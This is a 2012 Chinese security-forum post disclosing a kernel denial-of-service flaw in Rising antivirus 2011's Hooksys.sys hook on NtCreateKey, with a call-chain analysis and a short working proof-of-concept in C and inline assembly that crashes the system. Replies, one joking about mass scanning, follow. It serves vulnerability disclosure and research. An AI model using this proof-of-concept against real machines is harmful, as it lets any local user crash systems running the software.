首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 软件逆向
    3. 发新帖
[原创]瑞星全功能安全软件2011内核拒绝服务漏洞
发表于: 2012-5-27 08:23 11127

[原创]瑞星全功能安全软件2011内核拒绝服务漏洞

cxthl 活跃值
2
2012-5-27 08:23
11127

瑞星全功能安全软件2011是一款集“智能云安全”,智能安全防护,智能杀毒为一体的专业安全软件.

最新版本23.00.63.28(2012-5-27)存在内核拒绝服务漏洞,可导致任意权限用户在安装了瑞星的系统上引发蓝屏.
存在问题的组件:Hooksys.sys 
版本:25.0.0.57,CheckSum = 0002ED85, TimeStamp = 4EDDA48B
数字签名仍为2011.12.6

瑞星在NtCreateKey HOOK函数中对ObjectAttributes结构体的参数校验不严格,就将参数传递给内核函数ZwOpenKey,结果引发蓝屏.在未安装瑞星的系统下没有影响.
调用过程:
ZwCreateKey -> hk_ZwCreateKey -> (检查了ObjectAttributes->ObjectName) -> ZwOpenKey -> 上个模式改为KernelMode,系统不检查参数有效性 ->ObOpenObjectByName -> ObpCaptureObjectCreateInformation -> 系统函数判断SecurityDescriptor域存在,且上个模式为内核模式,因此不做参数检查,直接将参数 ->SeCaptureSecurityDescriptor -> SeCaptureSecurityDescriptor访问错误的SecurityDescriptor地址,系统崩溃蓝屏
偏移Hooksys+e27a



测试代码:
        WCHAR fuzz[] = L"xxxx_fuzz_rising";

  HMODULE hlib = LoadLibrary(L"ntdll.dll");
  PVOID p = GetProcAddress(hlib , "ZwCreateKey");

  OBJECT_ATTRIBUTES oba ;
  UNICODE_STRING strname ; 
  strname.Buffer = fuzz; 
  strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ; 

  InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000);

  __asm{

    push 0 
      push 0
      push 0
      push 0
      lea eax,oba
      push eax
      push 0
      push 0
      call p 

  }

  return 0;

poc.rar

Mini052712-01.rar


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

上传的附件:
收藏
免费 6
支持
分享
最新回复 (8)
snorts
雪    币: 221
活跃值: (40)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
私信
2
难道是0day?不知道能不能进一步执行任意代码
2012-5-27 09:35
0
hackerlzc
雪    币: 1689
活跃值: (379)
能力值: ( LV15,RANK:440 )
在线值:
发帖
回帖
粉丝
私信
3
表示关注,。。。。
2012-5-27 10:22
0
Dstlemoner
雪    币: 292
活跃值: (153)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
4
拒绝服务  不是很危险,但是很严重。。。。360的水军 赶紧IP段,批量扫描啊~!!! O(∩_∩)O哈哈~

POC.exe  是DEMO吗???
2012-5-27 11:18
0
wwwzhigang
雪    币: 274
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
谢谢楼主分享,关注~~
2012-5-28 09:50
0
精谁
雪    币: 86
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
前排站位,广告出租
2012-5-28 12:33
0
guobing
雪    币: 11121
活跃值: (158)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
我顶,,,11年的,。
2012-5-28 14:27
0
tntaiyu
雪    币: 234
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
顶顶,瑞星现在的内核牛们,不知还有吗?
2012-5-28 16:13
0
xouou
雪    币: 90
活跃值: (91)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
我以前用瑞星经常蓝屏
是不是也是类似的原因?
*&^%$$%^&
2012-5-29 11:08
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//